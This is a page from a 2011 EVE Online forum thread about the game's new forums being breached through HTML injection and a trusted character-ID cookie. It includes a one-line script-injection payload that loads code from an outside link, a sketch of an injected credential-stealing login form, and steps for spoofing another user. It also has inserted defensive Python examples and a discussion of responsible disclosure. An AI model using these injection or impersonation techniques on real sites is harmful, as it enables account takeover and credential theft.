EVE Information Portal
New Dev Blog: New Forum Security Blog - Cookie Derp
 
This thread is older than 90 days and has been locked due to inactivity.


 
Pages: 1 2 3 4 5 [6] 7 8 9


Kepakh
Posted - 2011.04.12 12:08:00 - [151]
 

Remember the proverb...

Jimmae
Posted - 2011.04.12 12:11:00 - [152]
 

Edited by: Jimmae on 12/04/2011 12:16:42
Originally by: kakmonstret
Edited by: kakmonstret on 12/04/2011 12:05:20
Originally by: Jimmae
Originally by: Kepakh
Originally by: Kristina Vanszar
Standard HTML element, which is showing you ANOTHER website

See: iFrame

The script wouldn't be on the Forum, it would be hosted by another website, and therefore executed, but it would look like it is on the forums.


Whatever you inject into a frame still needs to be processed at the CCP web server, and CCP Sreegs clearly said that no script will pass, nor is there any evidence anyone has achieved that.


Did you even read what he wrote?

1. I present you with an injected login form.
2. You fill out said form.
3. It sends your credentials to me.
4. ???
5. PROFIT

PS: Remember the proverb!

PPS: A very simple example on how to include a .js file from an external source using an onclick handler:
<div onlick="(s=(d=document).createElement('script')).src='www.bit.ly/123';d.getElementsByTagName('body')[0].appendChild(s)">


Okay people, have you ever done stuff like this? Regarding the above example, a filter to filter out js will hopefully catch that. Now this being the CCP webdev clowns we can't be too sure.

Regarding frames they can load any other content on the web. If CCP doesn't have some very interesting check on their server that loads the iframe target and checks for js there it would not be able to do anything. In any way there is no way CCP can filter content on a remote site loaded in a frame. Because that content is *not* loaded by their server, instead it is only loaded by your browser. If the server does a check for frames and check their target the only thing it can do is to remove the frame completely. That such a check exists I would say is very unlikely.

Edit:
And all nice theory was blown away by no frames allowed. Well well, nice try. Very Happy


Script injection via HTML doesn't require frames at all and there are many ways to camouflage and obfuscate the necessary code unless you purge the HTML tags of ANY attributes. Some are browser specific, or even specific to a certain version. Some aren't. Writing a proper sanitation routine for this kind of stuff is VERY difficult. I was tasked with that once. Eventually I convinced my superior that it was futile and that we had to use a different approach.

Edit: Spelling

GKO
Posted - 2011.04.12 12:16:00 - [153]
 

Hey Sreegs,

I don't agree with what your company did here, but the way you are handling all this nerd rage is somehow special. Keep up the good work (as in answering questions/feedback) and try to spread some of that to other departments. Some could really use that help...

Another topic: we could use you in the tobacco industry on more serious topics, hit me up in a private mail if you are interested.

.
G K O
.

Dray
Caldari
Euphoria Released
HYDRA RELOADED
Posted - 2011.04.12 12:19:00 - [154]
 

TL;DR

We're still getting the crap new forums?

kakmonstret
Posted - 2011.04.12 12:26:00 - [155]
 

Originally by: Jimmae
Edited by: Jimmae on 12/04/2011 12:16:42

Script injection via HTML doesn't require frames at all and there are many ways to camouflage and obfuscate the necessary code unless you purge the HTML tags of ANY attributes. Some are browser specific, or even specific to a certain version. Some aren't. Writing a proper sanitation routine for this kind of stuff is VERY difficult. I was tasked with that once. Eventually I convinced my superior that it was futile and that we had to use a different approach.

Edit: Spelling


If the filter is based on a limited list of acceptable tags and attributes, it would go a long way towards stopping js. But yes, the huge amount of ugly HTML hacks done by browser vendors is a huge problem.

CCP Sreegs

Posted - 2011.04.12 12:27:00 - [156]
 

Originally by: Misanth
Originally by: Kuroki Meisa Kennedy
Originally by: mazzilliu
apparently the guy who first reported the issue and later got banned said that his initial exploit report was incomplete, but there was no ccp effort to get him to elaborate.

perhaps it would be an improvement to have some sort of followup for security related reports, in case the reporter does not understand how to properly demonstrate an exploit, to try to get him to communicate clearly, rather than brush them off as another incomplete bug report or potential troll. i think if that happened the forums might have gone down some time sooner.


+1 I also feel just killing the messenger is wrong and makes the P in CCP stand for police.


Communication is not CCP's strongest side, never has been. They misunderstand players, we misunderstand them. They present stuff in a way that aggravates the playerbase, even tho it could easily be made in a more appealing fashion. Etc.

I gave up petitioning CCP for now; the last couple of petitions they just gave me standard replies asking for information I already submitted in the first petition. There is no point raising your voice when you talk to the deaf.


For security matters at least the best method of contact is security@ccpgames.com. I can't attest to what anyone else does in any other system but that goes directly to me.

CCP Sreegs

Posted - 2011.04.12 12:28:00 - [157]
 

Originally by: Makko Gray
I find it interesting that HTML could be injected into a signature but not script and really hope you do not look at the use of the script tag as the only indicator of script injection as it can also occur on HTML attributes and through various encoding techniques (some browser specific).

There are some good XSS cheat sheets you can check against for testing cross site scripting vectors such as this one: http://ha.ckers.org/xss.html

Also .NET & C# rocks as long as you know what your doing (ASP.NET WebForms is a bit sucky though).


In essence there was only an allowed subset of HTML rather than a disallowed subset.

We're aware of this website and I've used it myself in the past. Thanks for the tip though!
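Several posts above make the same point from different angles: Jimmae that attribute-based injection and encoding tricks make a blocklist sanitizer a losing game, kakmonstret that an allow-list of tags and attributes goes a long way, Makko Gray that `<script>` is not the only vector, and CCP Sreegs that the forum used "an allowed subset of HTML". The following is an added example, not code from any poster and not CCP's forum code, showing what that allow-list approach looks like in Python's standard library. The tag set, attribute set and sample fragments are constructed for illustration; a naive blocklist filter is included beside it only to show what the allow-list handles without having to know the attribute's name.

```python
import html
import re
from html.parser import HTMLParser

# Allow-list (constructed for this example): only these tags survive, and only
# these attributes on them. Anything not listed, including every on* handler
# however it is spelled, every frame/iframe, script and style, is dropped without
# the code having to name it.
ALLOWED_TAGS = {"b", "i", "u", "em", "strong", "p", "br", "blockquote", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
URL_ATTRS = {"href", "src"}
VOID_TAGS = {"br", "img"}
RAW_TEXT_TAGS = {"script", "style"}  # their text content is code, not prose: drop it
SAFE_SCHEMES = ("http://", "https://")


def safe_url(value):
    """Return the URL if it uses http(s), else None.

    Entities are decoded and whitespace/control characters removed before the
    scheme check, because browsers tolerate both inside a scheme name; that is the
    kind of browser-specific encoding trick Makko Gray and Jimmae refer to."""
    decoded = html.unescape(value)
    cleaned = re.sub(r"[\s\x00-\x1f]", "", decoded)
    if cleaned.lower().startswith(SAFE_SCHEMES):
        return cleaned
    return None


class AllowListSanitizer(HTMLParser):
    """Rebuilds the fragment from scratch, emitting only allow-listed markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.suppress = False  # inside <script>/<style>: discard text too

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.suppress = True
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag: drop the tag, keep its (escaped) text content
        kept = []
        for name, value in attrs:  # HTMLParser already lowercased the names
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in URL_ATTRS:
                value = safe_url(value or "")
                if value is None:
                    continue  # javascript:, data:, vbscript: ... never reach the output
            kept.append(' %s="%s"' % (name, html.escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.suppress = False
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.suppress:
            # Text was decoded by the parser; re-escape it so it stays text.
            self.out.append(html.escape(data, quote=False))


def sanitize(fragment):
    parser = AllowListSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# The approach the thread warns against: strip the names you happened to think of.
BLOCKLIST = re.compile(r"<script|onclick=", re.IGNORECASE)


def blocklist_filter(fragment):
    return BLOCKLIST.sub("", fragment)


if __name__ == "__main__":
    # Constructed sample signatures, benign payloads.
    for sample in ['<b onmouseover="x()">hi</b>',
                   '<iframe src="http://example.com/"></iframe>',
                   '<a href="java&#x09;script:alert(1)">x</a>',
                   '<img src="http://example.com/a.png" alt="pic" onerror="x()">']:
        print(repr(sample), "->", repr(sanitize(sample)), "| blocklist:", repr(blocklist_filter(sample)))
```

The design point is the one kakmonstret makes: the allow-list never has to enumerate dangerous attributes, so a handler name the filter author never heard of (or a misspelled one a particular browser still honours) is dropped exactly like `onclick`. The URL check is the part most allow-lists forget; without it `<a href>` remains a script vector even though every other attribute is gone.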

Whitehound
The Whitehound Corporation
Frontline Assembly Point
Posted - 2011.04.12 12:30:00 - [158]
 

Originally by: Devblog
From: Duderino24@poomail.com
Subject: YOU GUYS ARE IDIOTS LMAO
Body: Hey I just wanted to let you know how much you smell terrible and also how bad your posts are. I found a giant gaping hole in one of your systems. If you want to know how I did it you can go jump in a lake lmao!

And here is an example of a good exploit report:

From: Cooldude@brosef.com
Subject: Important - Vulnerability found in System X ...

The good exploit reports need to be sent to: Faildude@eve-online.com.
In urgent cases one can send messages to: HookersAndBooze@eve-online.com.

Dray
Caldari
Euphoria Released
HYDRA RELOADED
Posted - 2011.04.12 12:43:00 - [159]
 

Originally by: GKO
but the way you are handling all this nerd rage is somehow special.


They are handling nerd rage the same way we all do, they're ignoring it.

What I know about web/forum coding is on a par with CCP's testing atm (<-- did you see what I did there?).

Joking aside, there's a worrying trend developing at CCP regarding quality and excellence which they were so proud of, I've had my fair share of rants and "nerd rage" because of what they've done in the past but it's never been enough to pack up and leave, the good has always outweighed the bad and tbh the bad was never close enough to tip the scales but as time goes on it's not as big a gap as it used to be, and if I'm brutally honest the current forum fiasco is bad but it wouldn't cause me to quit not even close to it.

The only thing in recent times that really made me sit up and think "wtf" was the inane comment about the research showing that more new content is better than fixing old problems in terms of taking the game forward during a Q&A at the fanfest, 2009 or 2010 I think, I could be wrong here but I'm guessing that the research that showed that would not hold up if Eve was the only game that it was applied to, simply because Eve is a very niche game, the average age of the player base and the sandbox nature of the game makes it a stand alone MMO for me, like I said I could be wrong but I honestly believe I'm not, and with that in mind that incident more than any other, not T20 or the train wreck of the new forums, is the single most worrying thing for me regarding CCP's attitude and the future of the game.

CCP Sreegs

Posted - 2011.04.12 12:59:00 - [160]
 

Man long posts like this are really hard to respond to but I'll give it a shot ugh I hate this editor... :mad:

Originally by: Florestan Bronstein

The widespread perception in the shc thread was that the only way to get CCP to act fast is to publicize and exploit the vulnerabilities.

CCP has a long history of being extremely slow to react to exploits in other parts of the game (even exploits that are not just "bugs" such as the Monkeysphere incident).

One frequently voiced concern was that the new forums must be taken down before the weekend or else the risk of "serious" exploits getting into the wild would become too high.

Are you convinced that the forums would have been shut down on Friday/Saturday if you had just received a couple of bug reports?



I can't speak to perception I can only speak to my commitments to respond. I can tell you that any and all exploits sent to that email address are actioned on. I'm exploring opportunities internally to create an escalation path to me via other methods as well but for now that's what we have. Based on the timeline I have it was less than 30 minutes from the time I became aware of an exploit to the time the forums were taken offline the first time. Less than 5 minutes on the second round when I received an email.
Originally by: Florestan Bronstein
At what times is security@ccpgames.com monitored? What's the maximum time you might not be aware of a vulnerability that has been forwarded to that mailbox?


It's monitored as long as I'm awake. I know that's a gap and as I said in the above comment I'm trying to sort out how to best bridge it. As it stands right now I'm a single point of failure, though to be fair I don't sleep much.

Originally by: Florestan Bronstein
Do you really have the internal leverage to shut down central parts of the website when the exploit has not yet been observed in the wild?


In this particular instance I didn't have to test that but if I hadn't been able to get in touch with people I had the resources available to act on what needed to be acted on. This is really an internal process question that's kind of hard to answer, but from my perspective I've always done what I thought needed to be done in the course of my career and it hasn't served me wrong thus far.

Originally by: Florestan Bronstein
There were some reports that parts of the exploits were applicable to EVE Gate - I remember someone mentioning that it is possible to write evemails from unsubscribed accounts etc - was EVE Gate not taken down because these claims are simply not true or because EVE Gate is a too central/integrated part of the EVE experience (and cost/benefit did not justify shutting it down)?


Eve Gate was not taken down because, to our knowledge, you can't do anything from EVE gate that is malicious. We've tested the email sending you're referring to and while I'm not saying it's impossible, we've never been able to duplicate it. We believe a user being able to post on the forums who shouldn't have may be related to the forums trusting the EVE Gate authentication. If you're aware of any real issues with EVE Gate then let me know but to date we've not found anything. I don't base my assessments on cost/benefits but rather risk.

Originally by: Florestan Bronstein
Some people claimed part of the vulnerabilities had already been mentioned on forums and/or reported to CCP during the public testing of the new forums. Can you comment on that?


Not at this time. The post mortem analysis isn't done until after the existing incident is closed. That means any investigation of this nature is forthcoming, but not an afterthought.

I think I've already addressed script obfuscation and such but if that doesn't suffice let me know. I'm running out of space.

I'll give some thought to the idea in your edit.



CCP Sreegs

Posted - 2011.04.12 13:00:00 - [161]
 

Originally by: Othran
Apologies if this has been directly answered - I have looked and don't see it.

CCP Sreegs - did the security team test the new forums for common vulnerabilities before they went live?

I'd expect every company to pen test internet-facing assets prior to any deployment to a live environment. I'm just curious who, if anyone, was responsible for testing in this instance.


Third parties did do an assessment. The rest I can't comment on for the time being.

Elvis Preslie
Posted - 2011.04.12 13:01:00 - [162]
 

Originally by: Marconus Orion
First in a soon to be rage thread.

This is a perfect example of spam, an unsolicited post relating nothing to the subject of the thread.

STOP MAKING POSTS unless you have something respectful or productive to say about the thread AND read all posts in the threads up until the one you're posting, to make sure you address all of them.

If you don't have something nice to say, don't say it.

Raid'En
Posted - 2011.04.12 13:02:00 - [163]
 

Edited by: Raid'En on 12/04/2011 13:04:20

still raging about this event, but must admit that CCP Sreegs seems like a really cool guy.

the current whining level is however pretty high ; seems it's back to what it was before fanfest and the eve forever trailer which shut everyone up for a moment.

seems botting, which was one of the big rages at this moment, currently has a working answer but...
was not enough. nullsec guys are still raging about ano change.
we want more. more actions. more words.
if we could have that much dev answers on other blogs it would be really cool.

forum whine level won't drop for long term before you give us, either a good bone, or something real. whiners won't listen if you don't do that.
and something that is not here to make forget a mistake, not a + which is at the same time of a -, but a real +, with nothing to hide.

CCP Sreegs

Posted - 2011.04.12 13:05:00 - [164]
 

Originally by: Ban Doga
Edited by: Ban Doga on 12/04/2011 07:38:59
Originally by: Ban Doga
Edited by: Ban Doga on 11/04/2011 09:53:23
Originally by: Bomberlocks
We'll see what Sreegs posts in his blog, but I'm not entirely convinced that CCP will be honest as to the extent of the problem as I think it might open them up to possible legal problems.


The blog will reiterate the statements already made.
This will include "injection of HTML", "user data was not at risk" and "security's job is to react to issues - not to prevent them by reading code".
It will contain a more lengthy and (slightly) more detailed explanation of "What" happened but not "Why".

Questions regarding "Why" will be met with "Policy says 'No'", "I already explained that", "I say what I said" and "Asking about bans or warnings could get you a ban or warning yourself".


And I'll be delighted to be wrong...

Not too disappointed I wasn't wrong.

I find it a bit odd that you cast away that "the method by which your information would have been at risk would have been in the form of malware, session theft or keylogging of your local machine" with "it's always a best practice to keep your computers safe".
If that's the stance on security could you please get someone to get rid of the "You are leaving CCP-land. Evil people might be trying to attack your computer." warning when following links in the forum. It's the same thing and you said "I'm stating outright that customer data was never at risk.".
So I guess we don't need that warning...


I'm also wondering about your two example mails to report vulnerabilities.
None of them state "I will continue" or "I will stop", yet you seem to imply the first one will continue but the second won't.
What's the magic word/phrase/indicator here?


Do you also agree that one has to make actual use of a (potential) exploit at least once to confirm it is there?


I'm really not quite sure what you're trying to say here aside from what appears to be a questioning of my honesty without any meat. While I'll be the first to admit I don't know everything there is to know in this world, I've put my cards on the table. If you're going to insinuate that I am incorrect I'd ask that you at least spend the time to say how instead of "you're a liar".

Responsible exploit testing insinuates that you verify its existence then report it rather than continuing to abuse it. That's the line. If that's not clear enough or if you're uncertain as to your ability to draw that line then I'd posit that perhaps you're not in a position where you should be doing such things.

Kristina Vanszar
Caldari
Posted - 2011.04.12 13:05:00 - [165]
 

Originally by: CCP Sreegs
Originally by: Othran
Apologies if this has been directly answered - I have looked and don't see it.

CCP Sreegs - did the security team test the new forums for common vulnerabilities before they went live?

I'd expect every company to pen test internet-facing assets prior to any deployment to a live environment. I'm just curious who, if anyone, was responsible for testing in this instance.


Third parties did do an assessment. The rest I can't comment on for the time being.


So some third parties... ?idiots? tested ?something? and CCP believed them?
And as you can't comment, someone's head has to roll....

Beerstien
Caldari
Sanctum Scala Caeli
Deus Malus
Posted - 2011.04.12 13:08:00 - [166]
 

Edited by: Beerstien on 12/04/2011 13:39:12
Originally by: CCP Sreegs

I could make up a completely arbitrary date that would mean nothing whatsoever if that would make you feel better?


Lol nice answer, keep up the good work Smile
Oh and remember to breathe Very Happy

CCP Sreegs

Posted - 2011.04.12 13:14:00 - [167]
 

Originally by: Moron78
I know crap about computers, forums and all. So for me, as a regular customer, this is an issue of trust. Since CCP's notice on the forums was rather scarce when the forum thing hit I did what I usually do for stuff CCP is being coy about, Kugu and Scrapheap. (Well, the latter no more.) Now as I said I don't know much about this, but what was shown to be done on SHC seemed really basic. Which I gather to be the gist of the discussion thread over on Kugu also.

And CCP let it past. Sreegs, you say in the blog that you haven't been able to get in scripts that would run malware, key loggers and stuff of those forums. But you are by no means sure. And you even very inelegantly try to put it on the end-user. ("Even were someone able to have injected script the method by which your information would have been at risk would have been in the form of malware, session theft or keylogging of your local machine rather than some window into our secure environment.") Now to not get off track, I recognise that only to a very limited degree can CCP be responsible for what takes place at my computer. But, CCP made a forum where you are not ruling out that keyloggers etc could be embedded, and by leaving a rather obvious security hole for the computer savvy.

And regardless of that, as I understand it the hole is by no means insignificant to CCP as it enabled reading of all subforums, including subforums where stuff potentially under NDA could be discussed. (I'm assuming that NDA information may be discussed in the closed CMS forum.)

So, my question. If CCP let this slip by, what else have you not been able to catch? I hope that this is a case of Sreegs' department being bypassed in internal processes. But as Sreegs says, they aren't about to tell us. My issue with leaving this undisclosed is that I no longer have any trust in CCP when it comes to security measures. Why, Sreegs, would I trust you to rectify and make a secure forum - or anything else - when the last attempt potentially could have exposed end users and opened NDA information to the world?


I believe you misunderstand my statement. From a security perspective the only computer in the world you can be 100% certain of being secure is one that is in a vault and turned off. For me to come out and say EVERY SINGLE POSSIBLE EXPLOIT EVER WAS IMPOSSIBLE ON THE FORUM would be blowing sunshine up your rear. I'm not sure how you could decide that my suggestion that you change your information and run a scan "just in case" is placing the blame on the end user, but I'll just say it couldn't be farther from the truth. It's a precaution and one I think people should practice fairly often as there are a lot of sites on the internet that take things far less seriously than we do.

We've performed an audit of sensitive forums to see who saw what.

I'll ask that you not trust me personally to make a secure forum because I don't make forums. My role is to eradicate the problem and make certain you folks are aware of the situation while also handling an internal investigation. You don't have to remind us of the value of NDA'd information because it's our NDA. Nobody stands to lose more than CCP in that particular case.

Niraia
Seekers of a Silent Paradise
Posted - 2011.04.12 13:14:00 - [168]
 

Originally by: CCP Sreegs
Originally by: Othran
Apologies if this has been directly answered - I have looked and don't see it.

CCP Sreegs - did the security team test the new forums for common vulnerabilities before they went live?

I'd expect every company to pen test internet-facing assets prior to any deployment to a live environment. I'm just curious who, if anyone, was responsible for testing in this instance.


Third parties did do an assessment. The rest I can't comment on for the time being.


Are they still being paid? Are the ******ed web developers who were responsible? How about the people who hired them?

I can't see how anyone can feel safe with this stuff, or confident in the company and its leadership, until the answer to each of those questions is no.

CCP Sreegs

Posted - 2011.04.12 13:15:00 - [169]
 

Originally by: Smagd
Edited by: Smagd on 12/04/2011 08:59:35
Maybe I shouldn't say this, but my confidence is a bit shaken (not stirred).

I can quote at least two historic instances where people have been trying to point CCP to an issue, and no petition would help until someone went to the forums and made it public:

T20's Dev Hax would probably serve as a good example of how not to report issues, but Dark Shikari's Trade Window Scam is certainly an example of a correct way to do it - and it STILL took a forum threadnaught.

At this point I'm not really sure that any "procedures put in place" to make it easier to get CCP to listen actually work.

In the light of the current forum "cookie derp" I may have become a little hard to convince that emails sent to that fancy security email address are treated with any better priority sorting than critical petitions.

Better than "Hey that subject line looks important".


My intent is not to be rude, but I'd like to point out that the security email was established because I was concerned about the feedback loop. If you haven't used it I don't find encouraging others not to because a completely separate process hasn't worked in the past to be a very valid exercise.

TLWE
Polish Lords' Confederacy
Posted - 2011.04.12 13:18:00 - [170]
 

We all hope the new and even more improved now forums will be back soon. Thanks to your dedicated work and craftsmanship in... python. Python? Really? Oh well. Good work. Keep it up and do not give up. Smile

CCP Sreegs

Posted - 2011.04.12 13:19:00 - [171]
 

Originally by: Hel O'Ween
What this whole damage control dev blog - and the discussion around it - happily ignores, is the fact that after the forums were taken down the first time and went online again with an assuring "we fixed it, everything's fine now" statement accompanying it, the problems were still there!

Only after another demonstration, they were put offline. How assuring is this for us?

Oh, and thank you very much for making clear that your paying customers are to blame for this, as they didn't write the petitions/bug reports in such a way that you don't have to do the research yourself. I'd suggest you scrap every report that has no compilable code attached to it. Anything else can't be taken seriously.


I could be wrong but I seem to recall the statement being that the known exploits were fixed.

Nobody's ever insinuated that this is anything other than our fault so I apologize that you feel that was the case.

Mister Rocknrolla
Posted - 2011.04.12 13:21:00 - [172]
 

Originally by: CCP Sreegs

Responsible exploit testing insinuates that you verify its existence then report it rather than continuing to abuse it. That's the line. If that's not clear enough or if you're uncertain as to your ability to draw that line then I'd posit that perhaps you're not in a position where you should be doing such things.


^^This is the clearest definition on "is it abuse or is it testing a possible exploit" I've read.


Kristina Vanszar
Caldari
Posted - 2011.04.12 13:26:00 - [173]
 

Originally by: Mister Rocknrolla
Originally by: CCP Sreegs

Responsible exploit testing insinuates that you verify its existence then report it rather than continuing to abuse it. That's the line. If that's not clear enough or if you're uncertain as to your ability to draw that line then I'd posit that perhaps you're not in a position where you should be doing such things.


^^This is the clearest definition on "is it abuse or is it testing a possible exploit" I've read.




Sorry to say that, but when I find a bug on some website, I go as deep as possible into it, until either there is nothing deeper or the site is broken. That happened 2 times this year, and the admins were pretty much ****ed when I told them or when they noticed, but shortly after they've been very thankful.

So, I do not understand how you can draw a line between testing and abusing;

for me abusing is stealing information, using the tool/site in a way to harm people.

I understand that you can not confirm that none of the "hidden" information has been copied,
so you're acting on a "we assume it has been stolen/copied" policy, is that right?

Whitehound
The Whitehound Corporation
Frontline Assembly Point
Posted - 2011.04.12 13:32:00 - [174]
 

Originally by: Niraia
Are they still being paid? Are the ******ed web developers who were responsible? How about the people who hired them?

I can't see how anyone can feel safe with this stuff, or confident in the company and its leadership, until the answer to each of those questions is no.

I heard the punishment at CCP for failures is "to answer every stupid comment the community has to offer."

Kepakh
Posted - 2011.04.12 13:32:00 - [175]
 

Edited by: Kepakh on 12/04/2011 13:49:49
Originally by: Raid'En

forum whine level won't drop for long term


Most of this fuss comes from lack of critical thinking and blowing the issue out of proportion. Panic and paranoia is difficult to stop or control.

Errors happen, all the time and everywhere. Only what matters is the results of failure investigation and steps that will follow.



What I was missing or found not stressed enough in the blog, is a message that would try to calm people down and explain that web server security is more complex than injected HTML and that there are other layers and security measures to protect the server because that is what this is about - a few individuals making drama and spreading panic. The way the blog is written, it is more about the internal processes rather than security - which is the primary concern here and you end up, despite your best intentions, dragged into the stirred drama.

Super Whopper
I can Has Cheeseburger
Posted - 2011.04.12 13:40:00 - [176]
 

Sreegs, thank you very much for engaging the community like this. While I am usually (rightly) negative about CCP, I'd like to commend you for taking the time to respond to all these concerns. Also you are to be commended for trying to explain, albeit in basic details, how the flaw worked and the security of the new forums.

I would like to know whether the new forums allow the scaling of frames to fit all resolutions or whether they've been designed to fit 1280x1024 only.

Maplestone
Myth and Peace Lords
Posted - 2011.04.12 13:46:00 - [177]
 

Edited by: Maplestone on 12/04/2011 13:47:30
One of the possible problems when news of an exploit goes public is that it creates an instant rumour mill that mutates the details and generates false reports that then make it harder and harder to isolate which issues are real and which are urban myths being re-reported.

( *hangs head in shame for no particular reason* )

Daedalus II
Helios Research
Posted - 2011.04.12 13:52:00 - [178]
 

Originally by: Whitehound

I heard the punishment at CCP for failures is "to answer every stupid comment the community has to offer."

No, it's defenestration, I saw that on youtube Laughing

Othran
Brutor Tribe
Posted - 2011.04.12 13:58:00 - [179]
 

Originally by: CCP Sreegs
Third parties did do an assessment. The rest I can't comment on for the time being.


Thank you. I can read between the lines Wink

Qordel
Caldari
School of Applied Knowledge
Posted - 2011.04.12 13:58:00 - [180]
 

Originally by: Herschel Yamamoto

The second problem was even dumber. The forum's method of telling what character you're posting as was a simple cleartext string in the cookie, of the type "lastSelectedCharacter=1840703239". Fair enough - it's a non-crazy way to remember which of your three toons to post as - except that the server just took the character ID and trusted it completely, with no checking. If I set my last ID to CCP Sreegs(which is the ID number I used above - they're easy to look up), then I could post as Sreegs, edit Sreegs' posts, and have access to all mod tools and hidden forums Sreegs can see...without ever having to actually log in to Sreegs' account. Just set your ID in the cookie, the server takes it as gospel without checking, and you're in as anyone you like.


Having the server verify it isn't enough, either. That would still be a sloppy solution. The real solution that they should have deployed (and which is pretty much Cookies/sessions-101) would be that the cookie should have contained NOTHING except a single salted hash key, so that even someone looking at the cookie would have no idea what data it contains. Not even the username or UID that it is regarding.

Then it's dead simple to match that hash key against the database of non-expired sessions and get any data you could possibly require on the server side.

I could see someone like myself who doesn't do webdev for a living making a mistake like that. Ignorance and all, you know (though almost any reference to how to handle sessions on the internet should explain it to a newbie). Professional web developers, however, should never ever make that mistake. That shouldn't be an after-release "oops". That should be a fundamental flaw that doesn't make it past the rough white-board sketch.
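To make the contrast in Qordel's post concrete, here is an added example (my own illustration, not CCP's forum code and not something any poster supplied) of the two designs side by side in Python: the cookie-trusting pattern Herschel Yamamoto describes, and a server-side session store where the cookie carries only an opaque random token and the posting character is chosen and validated on the server. Account names, character ids and the `session` cookie name are constructed for the example.

```python
import secrets
import time

# Constructed sample data (not real EVE ids): which characters each account owns.
ACCOUNT_CHARACTERS = {
    "alice": {1001, 1002, 1003},
    "bob": {2001},
}


def parse_cookie_header(header):
    """Minimal Cookie-header parser: 'a=1; b=2' -> {'a': '1', 'b': '2'}."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def vulnerable_resolve_poster(cookie_header):
    """The pattern described in the quoted post: the character id is read straight
    out of the cookie and trusted. Whoever edits the cookie posts as that id."""
    return int(parse_cookie_header(cookie_header)["lastSelectedCharacter"])


class SessionStore:
    """Server-side sessions keyed by an opaque random token.

    The client only ever holds the token; account, selected character and expiry
    live here, so there is nothing in the cookie worth editing."""

    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self._sessions = {}  # token -> {"account", "character", "expires"}

    def login(self, account, now=None):
        now = time.time() if now is None else now
        # 256 random bits: unguessable, and meaningless to whoever reads the cookie.
        token = secrets.token_urlsafe(32)
        self._sessions[token] = {"account": account, "character": None, "expires": now + self.ttl}
        return token

    def _lookup(self, token, now):
        session = self._sessions.get(token)
        if session is None or session["expires"] < now:
            self._sessions.pop(token, None)  # expired sessions are discarded on sight
            return None
        return session

    def select_character(self, token, character_id, now=None):
        """Changing the posting character is a server-side state change, checked
        against the characters the logged-in account actually owns."""
        now = time.time() if now is None else now
        session = self._lookup(token, now)
        if session is None:
            return False
        if character_id not in ACCOUNT_CHARACTERS.get(session["account"], set()):
            return False
        session["character"] = character_id
        return True

    def resolve_poster(self, cookie_header, now=None):
        """Which character is posting, derived only from the session record.
        Any other cookie the client sends (e.g. lastSelectedCharacter) is ignored."""
        now = time.time() if now is None else now
        token = parse_cookie_header(cookie_header).get("session", "")
        session = self._lookup(token, now)
        if session is None:
            return None
        return session["character"]


def session_cookie_header(token):
    """Set-Cookie value for the token. HttpOnly keeps injected script away from it
    (the scenario the rest of this thread is about); Secure keeps it off plain HTTP."""
    return "session=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % token


if __name__ == "__main__":
    store = SessionStore(ttl_seconds=60)
    token = store.login("alice", now=1000)
    store.select_character(token, 1002, now=1000)
    print(session_cookie_header(token))
    print("alice posts as", store.resolve_poster("session=" + token, now=1000))
    print("bob's character accepted?", store.select_character(token, 2001, now=1000))
    print("edited cookie honoured by vulnerable code:", vulnerable_resolve_poster("lastSelectedCharacter=2001"))
```

Qordel's phrasing ("a single salted hash key") and this example agree on the part that matters: the cookie value identifies a session record and nothing else, and every lookup and ownership check happens against server-side state. A random token needs no salting or hashing because it encodes nothing; the forum's mistake was not weak encoding of the id but trusting a client-supplied id at all.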

